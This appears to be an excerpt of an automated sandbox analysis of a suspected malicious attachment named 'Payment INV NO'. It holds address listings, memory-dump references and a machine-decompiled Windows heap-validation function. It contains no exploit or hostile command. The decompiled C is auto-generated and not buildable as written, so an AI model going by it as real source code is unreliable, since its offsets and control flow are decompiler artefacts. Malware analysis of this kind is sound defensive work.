                                                          0x017be48e
                                                          0x017be493
                                                          0x017be495
                                                          0x00000000
                                                          0x00000000
                                                          0x01803bd9
                                                          0x01803bef
                                                          0x01803bef
                                                          0x01803bf3
                                                          0x00000000
                                                          0x01803dc4
                                                          0x01803bf9
                                                          0x00000000
                                                          0x01803bf9
                                                          0x017be3a5
                                                          0x017be3a5
                                                          0x017be3a9
                                                          0x01803c05
                                                          0x01803c08
                                                          0x01803c0b
                                                          0x01803c14
                                                          0x01803c1b
                                                          0x01803c1e
                                                          0x01803c21
                                                          0x01803c23
                                                          0x01803c26
                                                          0x01803c28
                                                          0x01803c28
                                                          0x01803c2b
                                                          0x01803c2b
                                                          0x01803c26
                                                          0x01803c34
                                                          0x01803c38
                                                          0x01803c3d
                                                          0x01803c40
                                                          0x01803c43
                                                          0x01803c49
                                                          0x01803c4f
                                                          0x01803c53
                                                          0x01803c72
                                                          0x01803c77
                                                          0x01803c55
                                                          0x01803c6a
                                                          0x01803c6f
                                                          0x01803c85
                                                          0x01803c8c
                                                          0x01803c91
                                                          0x01803c9a
                                                          0x01803c9e
                                                          0x01803ca4
                                                          0x01803cab
                                                          0x01803cac
                                                          0x01803cac
                                                          0x01803c9e
                                                          0x01803c43
                                                          0x01803c0b
                                                          0x017be3b5
                                                          0x017be3bb
                                                          0x017be3bd
                                                          0x017be3c3
                                                          0x01803dba
                                                          0x00000000
                                                          0x017be3c9
                                                          0x017be3c9
                                                          0x017be3cc
                                                          0x017be3cf
                                                          0x017be3d6
                                                          0x017be3da
                                                          0x017be3df
                                                          0x017be3e1
                                                          0x017be3e4
                                                          0x017be3e8
                                                          0x01803cec
                                                          0x01803cf0
                                                          0x01803cf4
                                                          0x01803d03
                                                          0x01803d07
                                                          0x01803d0c
                                                          0x01803d0c
                                                          0x01803d0c
                                                          0x01803d10
                                                          0x01803d10
                                                          0x01803d13
                                                          0x01803d1a
                                                          0x01803d1a
                                                          0x01803d20
                                                          0x01803d2f
                                                          0x01803d22
                                                          0x01803d2b
                                                          0x01803d2b
                                                          0x01803d31
                                                          0x01803d33
                                                          0x01803d60
                                                          0x01803d60
                                                          0x01803d63
                                                          0x01803d63
                                                          0x01803d66
                                                          0x01803d68
                                                          0x01803d76
                                                          0x01803d77
                                                          0x01803d79
                                                          0x01803d81
                                                          0x01803d6a
                                                          0x01803d6a
                                                          0x01803d6c
                                                          0x01803d6f
                                                          0x01803d71
                                                          0x01803d71
                                                          0x01803d89
                                                          0x01803d8c
                                                          0x01803d8c
                                                          0x01803d92
                                                          0x01803d94
                                                          0x017be2e4
                                                          0x017be2e4
                                                          0x017be2e8
                                                          0x017be2f2
                                                          0x017be2f5
                                                          0x017be2f8
                                                          0x017be2f8
                                                          0x017be2f8
                                                          0x017be2fa
                                                          0x00000000
                                                          0x01803d9a
                                                          0x01803d9a
                                                          0x01803dab
                                                          0x01803dab
                                                          0x01803dae
                                                          0x00000000
                                                          0x00000000
                                                          0x01803d9f
                                                          0x01803da1
                                                          0x01803da3
                                                          0x017be30c
                                                          0x017be30f
                                                          0x017be2d8
                                                          0x017be2df
                                                          0x00000000
                                                          0x017be2df
                                                          0x01803da9
                                                          0x01803da9
                                                          0x017be2d6
                                                          0x017be2d6
                                                          0x00000000
                                                          0x017be2d6
                                                          0x01803d35
                                                          0x01803d35
                                                          0x01803d35
                                                          0x01803d38
                                                          0x01803d38
                                                          0x01803d3a
                                                          0x01803d4e
                                                          0x01803d3c
                                                          0x01803d3c
                                                          0x01803d3f
                                                          0x01803d3f
                                                          0x01803d42
                                                          0x01803d44
                                                          0x01803d46
                                                          0x01803d46
                                                          0x01803d46
                                                          0x01803d46
                                                          0x01803d49
                                                          0x01803d49
                                                          0x01803d55
                                                          0x01803d58
                                                          0x00000000
                                                          0x00000000
                                                          0x01803d5a
                                                          0x01803d5c
                                                          0x01803d5e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01803d5e
                                                          0x00000000
                                                          0x01803d38
                                                          0x01803d33
                                                          0x017be3ee
                                                          0x017be3f2
                                                          0x017be3f2
                                                          0x017be3f8
                                                          0x017be3ff
                                                          0x01803cb8
                                                          0x017be405
                                                          0x017be40e
                                                          0x017be40e
                                                          0x017be410
                                                          0x017be412
                                                          0x017be43b
                                                          0x017be43b
                                                          0x017be43e
                                                          0x017be43e
                                                          0x017be441
                                                          0x017be443
                                                          0x01803cd7
                                                          0x01803cd8
                                                          0x01803ce2
                                                          0x017be449
                                                          0x017be449
                                                          0x017be44b
                                                          0x017be44e
                                                          0x017be450
                                                          0x017be450
                                                          0x017be456
                                                          0x017be459
                                                          0x017be459
                                                          0x017be45f
                                                          0x017be461
                                                          0x00000000
                                                          0x017be467
                                                          0x017be467
                                                          0x017be46a
                                                          0x017be46a
                                                          0x017be46d
                                                          0x00000000
                                                          0x00000000
                                                          0x017be473
                                                          0x017be475
                                                          0x017be477
                                                          0x00000000
                                                          0x00000000
                                                          0x017be47d
                                                          0x017be47d
                                                          0x00000000
                                                          0x017be46a
                                                          0x017be414
                                                          0x017be414
                                                          0x017be414
                                                          0x017be417
                                                          0x017be417
                                                          0x017be419
                                                          0x01803cbf
                                                          0x017be41f
                                                          0x017be41f
                                                          0x017be422
                                                          0x017be422
                                                          0x017be425
                                                          0x017be427
                                                          0x017be429
                                                          0x017be429
                                                          0x017be429
                                                          0x017be429
                                                          0x017be42c
                                                          0x017be42c
                                                          0x017be432
                                                          0x017be435
                                                          0x00000000
                                                          0x00000000
                                                          0x01803cc8
                                                          0x01803cca
                                                          0x01803ccc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01803cd2
                                                          0x00000000
                                                          0x017be417
                                                          0x017be412
                                                          0x017be3c3
                                                          0x017be369
                                                          0x017be36c
                                                          0x017be36c
                                                          0x017be36f
                                                          0x00000000
                                                          0x00000000
                                                          0x017be371
                                                          0x017be373
                                                          0x017be375
                                                          0x017be484
                                                          0x017be381
                                                          0x017be383
                                                          0x017be38b
                                                          0x00000000
                                                          0x017be38b
                                                          0x017be37b
                                                          0x017be37b
                                                          0x017be37f
                                                          0x00000000
                                                          0x017be37f
                                                          0x017be34b
                                                          0x017be22a
                                                          0x017be22e
                                                          0x017be238
                                                          0x017be23b
                                                          0x017be23f
                                                          0x017be242
                                                          0x017be246
                                                          0x01803dff
                                                          0x01803e03
                                                          0x01803e07
                                                          0x01803e16
                                                          0x01803e1a
                                                          0x01803e1f
                                                          0x01803e1f
                                                          0x01803e1f
                                                          0x01803e23
                                                          0x01803e23
                                                          0x01803e26
                                                          0x01803e2d
                                                          0x01803e2d
                                                          0x01803e33
                                                          0x01803e40
                                                          0x01803e35
                                                          0x01803e3c
                                                          0x01803e3c
                                                          0x01803e42
                                                          0x01803e44
                                                          0x01803e76
                                                          0x01803e76
                                                          0x01803e79
                                                          0x01803e79
                                                          0x01803e7c
                                                          0x01803e7e
                                                          0x01803e8c
                                                          0x01803e8d
                                                          0x01803e8f
                                                          0x01803e97
                                                          0x01803e80
                                                          0x01803e80
                                                          0x01803e82
                                                          0x01803e85
                                                          0x01803e87
                                                          0x01803e87
                                                          0x01803e9f
                                                          0x01803ea2
                                                          0x01803ea2
                                                          0x01803ea8
                                                          0x01803eaa
                                                          0x01803ed2
                                                          0x01803ed2
                                                          0x01803ed6
                                                          0x01803ee4
                                                          0x01803ee7
                                                          0x01803eea
                                                          0x01803eea
                                                          0x00000000
                                                          0x01803eac
                                                          0x01803eac
                                                          0x01803eb9
                                                          0x01803eb9
                                                          0x01803ebc
                                                          0x00000000
                                                          0x00000000
                                                          0x01803eb1
                                                          0x01803eb3
                                                          0x01803eb5
                                                          0x01803ec5
                                                          0x01803ec5
                                                          0x01803ec6
                                                          0x01803ecd
                                                          0x00000000
                                                          0x01803ecd
                                                          0x01803eb7
                                                          0x01803eb7
                                                          0x01803ebe
                                                          0x00000000
                                                          0x01803ebe
                                                          0x01803e46
                                                          0x01803e46
                                                          0x01803e46
                                                          0x01803e49
                                                          0x01803e4c
                                                          0x01803e4c
                                                          0x01803e4e
                                                          0x01803e62
                                                          0x01803e50
                                                          0x01803e50
                                                          0x01803e53
                                                          0x01803e53
                                                          0x01803e56
                                                          0x01803e58
                                                          0x01803e5a
                                                          0x01803e5a
                                                          0x01803e5a
                                                          0x01803e5a
                                                          0x01803e5d
                                                          0x01803e5d
                                                          0x01803e69
                                                          0x01803e6b
                                                          0x00000000
                                                          0x00000000
                                                          0x01803e6d
                                                          0x01803e6f
                                                          0x01803e71
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01803e71
                                                          0x01803e73
                                                          0x00000000
                                                          0x01803e73
                                                          0x01803e44
                                                          0x017be24c
                                                          0x017be250
                                                          0x017be250
                                                          0x017be25d
                                                          0x01803dcb
                                                          0x017be263
                                                          0x017be265
                                                          0x017be26a
                                                          0x017be26d
                                                          0x017be26d
                                                          0x017be271
                                                          0x017be29c
                                                          0x017be29c
                                                          0x017be29f
                                                          0x017be29f
                                                          0x017be2a4
                                                          0x01803dea
                                                          0x01803deb
                                                          0x01803df5
                                                          0x017be2aa
                                                          0x017be2aa
                                                          0x017be2ac
                                                          0x017be2af
                                                          0x017be2b1
                                                          0x017be2b1
                                                          0x017be2b7
                                                          0x017be2ba
                                                          0x017be2ba
                                                          0x017be2c2
                                                          0x00000000
                                                          0x017be2c4
                                                          0x017be2c4
                                                          0x017be2c7
                                                          0x017be2cc
                                                          0x017be2d0
                                                          0x00000000
                                                          0x00000000
                                                          0x017be2d2
                                                          0x017be2d2
                                                          0x00000000
                                                          0x017be2c7
                                                          0x017be273
                                                          0x017be273
                                                          0x017be273
                                                          0x00000000
                                                          0x017be276
                                                          0x017be278
                                                          0x01803dd2
                                                          0x017be27e
                                                          0x017be27e
                                                          0x017be281
                                                          0x017be281
                                                          0x017be286
                                                          0x017be288
                                                          0x017be288
                                                          0x017be288
                                                          0x017be28b
                                                          0x017be28b
                                                          0x017be293
                                                          0x00000000
                                                          0x00000000
                                                          0x017be299
                                                          0x017be299
                                                          0x00000000
                                                          0x01803ddb
                                                          0x01803ddb
                                                          0x01803ddd
                                                          0x01803ddf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01803de5

                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01803C87
                                                          • HEAP[%wZ]: , xrefs: 01803C65
                                                          • HEAP: , xrefs: 01803C72
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 1503448466033d96ae2643547e2c35c943506cf38ba99baa1c416a3d8425e4ef
                                                          • Instruction ID: 8e6d90fbe71851167f4a9eb1e0ccb11d3f86b721c1f1c117a64d0bdc13d18beb
                                                          • Opcode Fuzzy Hash: 1503448466033d96ae2643547e2c35c943506cf38ba99baa1c416a3d8425e4ef
                                                          • Instruction Fuzzy Hash: 7612CE7060464AEFEB26CF29C884BBAFBA1BF45304F14859DE985CB385D734E941CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BE79D Relevance: 4.1, Strings: 3, Instructions: 394COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 91%
                                                          			E017BE79D(signed int __ecx, unsigned int __edx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t165;
				signed int _t174;
				signed short _t180;
				signed int _t183;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t192;
				intOrPtr _t195;
				signed int _t197;
				char _t199;
				signed int _t202;
				signed int _t208;
				void* _t212;
				signed int _t213;
				signed int _t215;
				intOrPtr _t223;
				signed short _t230;
				signed short _t233;
				signed int _t235;
				intOrPtr _t236;
				intOrPtr _t242;
				intOrPtr* _t252;
				signed short* _t257;
				signed int _t259;
				signed int _t260;
				unsigned int _t262;
				signed short _t263;
				signed short* _t264;
				intOrPtr* _t266;
				signed char _t268;
				signed char _t269;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t288;
				void* _t289;
				unsigned int _t298;
				void* _t303;
				signed char _t309;
				unsigned int _t312;
				intOrPtr* _t315;
				char _t317;
				signed int _t318;
				signed int _t321;
				void* _t323;
				signed char _t324;
				unsigned int _t333;
				signed int _t336;
				signed short* _t337;
				signed int _t339;

				_t165 = _a12;
				_t337 = _a4;
				_t336 = __ecx;
				_v24 = __edx;
				_v12 = _t165;
				_t5 = _t336 + 0x5c; // 0x0
				if(_t165 >  *_t5) {
					L14:
					__eflags = 0;
					return 0;
				}
				_v5 = _t337[1];
				_t257 = _t337 + ( *_t337 & 0x0000ffff) * 8;
				_t10 = _t336 + 0x4c; // 0x2
				_t11 = _t336 + 0x52; // 0x126a0180
				if((( *_t10 >> 0x00000014 &  *_t11 ^ _t257[1]) & 0x00000001) != 0) {
					goto L14;
				}
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t16 = _t336 + 0x50; // 0x1801257
					_t333 =  *_t16 ^  *_t257;
					 *_t257 = _t333;
					_t309 = _t333 >> 0x00000010 ^ _t333 >> 0x00000008 ^ _t333;
					if(_t333 >> 0x18 != _t309) {
						_push(_t309);
						L0184FA2B(_t257, __ecx, _t257, __ecx, _t337, __eflags);
					}
				}
				_t262 =  *_t257 & 0x0000ffff;
				_t312 = _t262;
				_t174 = ( *_t337 & 0x0000ffff) + _t312;
				_v32 = _t174;
				if(_t174 < _v12) {
					__eflags =  *(_t336 + 0x4c);
					if( *(_t336 + 0x4c) != 0) {
						_t257[1] = _t262 >> 0x00000008 ^ _t257[1] ^ _t262;
						_t35 = _t336 + 0x50; // 0x1801257
						 *_t257 =  *_t257 ^  *_t35;
						__eflags =  *_t257;
					}
					goto L14;
				}
				_t180 = _t257[4];
				_t263 = _t257[6];
				_v28 = _t180;
				_v16 = _t263;
				_t181 =  *((intOrPtr*)(_t180 + 4));
				_t264 =  &(_t257[4]);
				if( *_t263 !=  *((intOrPtr*)(_t180 + 4))) {
					L84:
					_push(_t264);
					_push( *_v16);
					L0185A80D(_t336, 0xd, _t264, _t181);
					goto L14;
				}
				_t339 = _a4;
				if( *_v16 != _t264) {
					goto L84;
				}
				 *((intOrPtr*)(_t336 + 0x74)) =  *((intOrPtr*)(_t336 + 0x74)) - _t312;
				_t29 = _t336 + 0xb4; // 0x0
				_t315 =  *_t29;
				if(_t315 == 0) {
					L18:
					_t266 = _v16;
					_t183 = _v28;
					 *_t266 = _t183;
					 *((intOrPtr*)(_t183 + 4)) = _t266;
					__eflags = _t257[1] & 0x00000008;
					if((_t257[1] & 0x00000008) != 0) {
						_t184 = E017BA229(_t336, _t257);
						__eflags = _t184;
						if(_t184 != 0) {
							goto L19;
						}
						E017BA309(_t336, _t257,  *_t257 & 0x0000ffff, 1);
						goto L14;
					}
					L19:
					_t268 = _t257[1];
					_t317 = 0;
					__eflags = _t268 & 0x00000004;
					if((_t268 & 0x00000004) != 0) {
						_t186 = ( *_t257 & 0x0000ffff) * 8 - 0x10;
						_v16 = _t186;
						__eflags = _t268 & 0x00000002;
						if((_t268 & 0x00000002) != 0) {
							_t303 = 4;
							__eflags = _t186 - _t303;
							if(_t186 > _t303) {
								_t186 = _t186 - _t303;
								__eflags = _t186;
								_v16 = _t186;
							}
						}
						_t188 = E017ED540( &(_t257[8]), _t186, 0xfeeefeee);
						_v28 = _t188;
						__eflags = _t188 - _v16;
						if(_t188 == _v16) {
							L60:
							_t317 = 0;
							goto L20;
						} else {
							_t236 =  *[fs:0x30];
							__eflags =  *(_t236 + 0xc);
							if( *(_t236 + 0xc) == 0) {
								_push("HEAP: ");
								E0179B150();
							} else {
								E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v28 + 0x10 + _t257);
							E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t257);
							_t242 =  *[fs:0x30];
							__eflags =  *((char*)(_t242 + 2));
							if( *((char*)(_t242 + 2)) == 0) {
								goto L60;
							} else {
								 *0x1886378 = 1;
								asm("int3");
								_t317 = 0;
								 *0x1886378 = 0;
								goto L20;
							}
						}
					}
					L20:
					_t269 =  *((intOrPtr*)(_t339 + 7));
					_t259 = ( *_t339 & 0x0000ffff) << 3;
					_v20 = _t257[1];
					__eflags = _t269 - 5;
					if(_t269 == 5) {
						_t129 = _t336 + 0x54; // 0x180126a
						_t271 =  *_t129 & 0x0000ffff ^  *(_t339 + 4) & 0x0000ffff;
					} else {
						__eflags = _t269 & 0x00000040;
						if((_t269 & 0x00000040) != 0) {
							_t271 =  *(_t339 + 4 + (_t269 & 0x3f) * 8) & 0x0000ffff;
						} else {
							__eflags = (_t269 & 0x0000003f) - 0x3f;
							if((_t269 & 0x0000003f) == 0x3f) {
								__eflags = _t269;
								if(_t269 >= 0) {
									__eflags =  *(_t336 + 0x4c) - _t317;
									if( *(_t336 + 0x4c) == _t317) {
										_t230 =  *_t339 & 0x0000ffff;
									} else {
										_t233 =  *_t339;
										__eflags =  *(_t336 + 0x4c) & _t233;
										if(( *(_t336 + 0x4c) & _t233) != 0) {
											_t139 = _t336 + 0x50; // 0x1801257
											_t233 = _t233 ^  *_t139;
											__eflags = _t233;
										}
										_t230 = _t233 & 0x0000ffff;
									}
								} else {
									_t298 = _t339 >> 0x00000003 ^  *_t339 ^  *0x188874c ^ _t336;
									__eflags = _t298;
									if(_t298 == 0) {
										_t235 = _t339 - (_t298 >> 0xd);
										__eflags = _t235;
										_t317 =  *_t235;
									}
									_t230 =  *((intOrPtr*)(_t317 + 0x14));
								}
								_t271 =  *(_t339 + (_t230 & 0xffff) * 8 - 4);
							} else {
								_t271 = _t269 & 0x3f;
								__eflags = _t271;
							}
						}
					}
					_t318 = _v12;
					_t260 = _t259 - _t271;
					_t272 = _v32;
					_t192 = _t272 - _t318;
					__eflags = _t192 - 2;
					if(_t192 <= 2) {
						_t318 = _t272;
						_v12 = _t318;
					}
					_t273 = 2;
					__eflags = _t273 - _t192;
					asm("sbb ecx, ecx");
					__eflags = _v5 & 0x00000002;
					_v16 = _t273 & _t192;
					if((_v5 & 0x00000002) != 0) {
						_t275 =  *_t339 & 0x0000ffff;
						 *((intOrPtr*)(_t339 + _t318 * 8 - 8)) =  *((intOrPtr*)(_t339 + _t275 * 8 - 8));
						 *((intOrPtr*)(_t339 + _t318 * 8 - 4)) =  *((intOrPtr*)(_t339 + _t275 * 8 - 4));
						_t195 =  *[fs:0x30];
						__eflags =  *(_t195 + 0x68) & 0x00000800;
						if(( *(_t195 + 0x68) & 0x00000800) != 0) {
							 *((short*)(_t339 + _v12 * 8 - 6)) = L0183E9F0(_t336,  *((intOrPtr*)(_t339 + _t318 * 8 - 6)),  *_t339 & 0x0000ffff, _t318, 4);
						}
					} else {
						_t223 =  *[fs:0x30];
						__eflags =  *(_t223 + 0x68) & 0x00000800;
						if(( *(_t223 + 0x68) & 0x00000800) != 0) {
							 *(_t339 + 3) = L0183E9F0(_t336,  *(_t339 + 3) & 0x000000ff,  *_t339 & 0x0000ffff, _t318, 4);
						}
					}
					_t197 = _v12 & 0x0000ffff;
					_t277 = _v12 << 3;
					_v28 = _t197;
					 *_t339 = _t197;
					_t199 = _t277 - _a8;
					__eflags = _v16;
					if(_v16 == 0) {
						 *(_t339 + 2) =  *(_t339 + 2) | _v20;
						__eflags = _t199 - 0x3f;
						if(_t199 >= 0x3f) {
							 *((intOrPtr*)(_t277 + _t339 - 4)) = _t199;
							 *((char*)(_t339 + 7)) = 0x3f;
						} else {
							 *((char*)(_t339 + 7)) = _t199;
						}
						_t96 = _t336 + 0x54; // 0x180126a
						 *(_t339 + 4 + ( *_t339 & 0x0000ffff) * 8) =  *_t96 ^  *_t339 & 0x0000ffff;
					} else {
						_t289 = _t277 + _t339;
						__eflags = _t199 - 0x3f;
						if(_t199 >= 0x3f) {
							 *((intOrPtr*)(_t289 - 4)) = _t199;
							 *((char*)(_t339 + 7)) = 0x3f;
						} else {
							 *((char*)(_t339 + 7)) = _t199;
						}
						_t67 = _t336 + 0x40; // 0x2
						_t324 =  *((intOrPtr*)(_t339 + 6));
						_t215 =  *_t67 & 0x00000040;
						_v32 = _t215;
						__eflags = _t324;
						if(_t324 == 0) {
							_t325 = _t336;
						} else {
							_t215 = _v32;
							_t325 = (_t339 & 0xffff0000) - ((_t324 & 0x000000ff) << 0x10) + 0x10000;
							__eflags = (_t339 & 0xffff0000) - ((_t324 & 0x000000ff) << 0x10) + 0x10000;
						}
						_t215 = _t215 != 0;
						E017BE1B9(_t336, _t325, _t289, _v20, (_t215 & 0xffffff00 | _t215 != 0x00000000) & 0x000000ff, _v28, _v16);
					}
					__eflags = _v24 & 0x00000008;
					_t321 = _a8;
					if((_v24 & 0x00000008) != 0) {
						__eflags = _t321 - _t260;
						if(_t321 < _t260) {
							_t260 = _t321;
						}
						_t90 = _t339 + 8; // 0xddeeddf6
						E01794637(_t336, _t90, _t260);
						goto L35;
					} else {
						__eflags =  *(_t336 + 0x40) & 0x00000040;
						if(( *(_t336 + 0x40) & 0x00000040) != 0) {
							_t288 = _t260 & 0x00000003;
							__eflags = _t288;
							if(_t288 != 0) {
								_t212 = 4;
								_t213 = _t212 - _t288;
								__eflags = _t213;
								_t288 = _t213;
							}
							_t202 = _a8;
							_t323 = _t288 + _t260;
							__eflags = _t202 - _t323;
							if(_t202 <= _t323) {
								L36:
								__eflags =  *(_t336 + 0x40) & 0x00000020;
								if(( *(_t336 + 0x40) & 0x00000020) != 0) {
									 *((intOrPtr*)(_t339 + _t202 + 8)) = 0xabababab;
									 *((intOrPtr*)(_t339 + _t202 + 0xc)) = 0xabababab;
								}
								 *(_t339 + 2) = (_v24 >> 0x00000004 ^  *(_t339 + 2)) & 0x0000001f ^ _v24 >> 0x00000004;
								return 1;
							} else {
								_t208 = _t202 - _t288 - _t260 & 0xfffffffc;
								__eflags = _t208;
								if(_t208 != 0) {
									_t159 = _t339 + 8; // 0xddeeddf6
									E017ED5E0(_t159 + _t323, _t208, 0xbaadf00d);
								}
								goto L35;
							}
						}
						L35:
						_t202 = _a8;
						goto L36;
					}
				} else {
					_t250 =  *_t257 & 0x0000ffff;
					_v20 = _t250;
					while(_t250 >=  *((intOrPtr*)(_t315 + 4))) {
						_t252 =  *_t315;
						if(_t252 == 0) {
							_t250 =  *((intOrPtr*)(_t315 + 4)) - 1;
							__eflags =  *((intOrPtr*)(_t315 + 4)) - 1;
							break;
						} else {
							_t315 = _t252;
							_t250 =  *_t257 & 0x0000ffff;
							continue;
						}
					}
					E017BBC04(_t336, _t315, 1, _t264, _t250, _v20);
					goto L18;
				}
			}



































































                                                          0x017be7a5
                                                          0x017be7aa
                                                          0x017be7ae
                                                          0x017be7b0
                                                          0x017be7b3
                                                          0x017be7b6
                                                          0x017be7b9
                                                          0x017be87c
                                                          0x017be87c
                                                          0x00000000
                                                          0x017be87c
                                                          0x017be7c2
                                                          0x017be7c8
                                                          0x017be7cb
                                                          0x017be7d1
                                                          0x017be7d9
                                                          0x00000000
                                                          0x00000000
                                                          0x017be7e3
                                                          0x017be7e5
                                                          0x017be7e8
                                                          0x017be7ec
                                                          0x017be7f8
                                                          0x017be7ff
                                                          0x01804035
                                                          0x0180403a
                                                          0x0180403a
                                                          0x017be7ff
                                                          0x017be805
                                                          0x017be80b
                                                          0x017be80d
                                                          0x017be80f
                                                          0x017be815
                                                          0x017be864
                                                          0x017be868
                                                          0x017be874
                                                          0x017be877
                                                          0x017be87a
                                                          0x017be87a
                                                          0x017be87a
                                                          0x00000000
                                                          0x017be868
                                                          0x017be817
                                                          0x017be81a
                                                          0x017be81d
                                                          0x017be820
                                                          0x017be823
                                                          0x017be828
                                                          0x017be82b
                                                          0x01804217
                                                          0x0180421a
                                                          0x0180421b
                                                          0x01804224
                                                          0x00000000
                                                          0x01804224
                                                          0x017be836
                                                          0x017be839
                                                          0x00000000
                                                          0x00000000
                                                          0x017be83f
                                                          0x017be842
                                                          0x017be842
                                                          0x017be84a
                                                          0x017be899
                                                          0x017be899
                                                          0x017be89c
                                                          0x017be89f
                                                          0x017be8a1
                                                          0x017be8a4
                                                          0x017be8a8
                                                          0x017bea56
                                                          0x017bea5b
                                                          0x017bea5d
                                                          0x00000000
                                                          0x00000000
                                                          0x0180404e
                                                          0x00000000
                                                          0x0180404e
                                                          0x017be8ae
                                                          0x017be8ae
                                                          0x017be8b1
                                                          0x017be8b3
                                                          0x017be8b6
                                                          0x0180405b
                                                          0x01804062
                                                          0x01804065
                                                          0x01804068
                                                          0x0180406c
                                                          0x0180406d
                                                          0x0180406f
                                                          0x01804071
                                                          0x01804071
                                                          0x01804073
                                                          0x01804073
                                                          0x0180406f
                                                          0x01804080
                                                          0x01804085
                                                          0x01804088
                                                          0x0180408b
                                                          0x018040f9
                                                          0x018040f9
                                                          0x00000000
                                                          0x0180408d
                                                          0x0180408d
                                                          0x01804093
                                                          0x01804097
                                                          0x018040b6
                                                          0x018040bb
                                                          0x01804099
                                                          0x018040ae
                                                          0x018040b3
                                                          0x018040c9
                                                          0x018040d0
                                                          0x018040d5
                                                          0x018040de
                                                          0x018040e2
                                                          0x00000000
                                                          0x018040e4
                                                          0x018040e4
                                                          0x018040eb
                                                          0x018040ec
                                                          0x018040ee
                                                          0x00000000
                                                          0x018040ee
                                                          0x018040e2
                                                          0x0180408b
                                                          0x017be8bc
                                                          0x017be8c2
                                                          0x017be8c5
                                                          0x017be8c8
                                                          0x017be8cb
                                                          0x017be8ce
                                                          0x01804100
                                                          0x01804108
                                                          0x017be8d4
                                                          0x017be8d4
                                                          0x017be8d7
                                                          0x01804115
                                                          0x017be8dd
                                                          0x017be8e1
                                                          0x017be8e3
                                                          0x0180411f
                                                          0x01804121
                                                          0x01804146
                                                          0x01804149
                                                          0x0180415a
                                                          0x0180414b
                                                          0x0180414b
                                                          0x0180414d
                                                          0x01804150
                                                          0x01804152
                                                          0x01804152
                                                          0x01804152
                                                          0x01804152
                                                          0x01804155
                                                          0x01804155
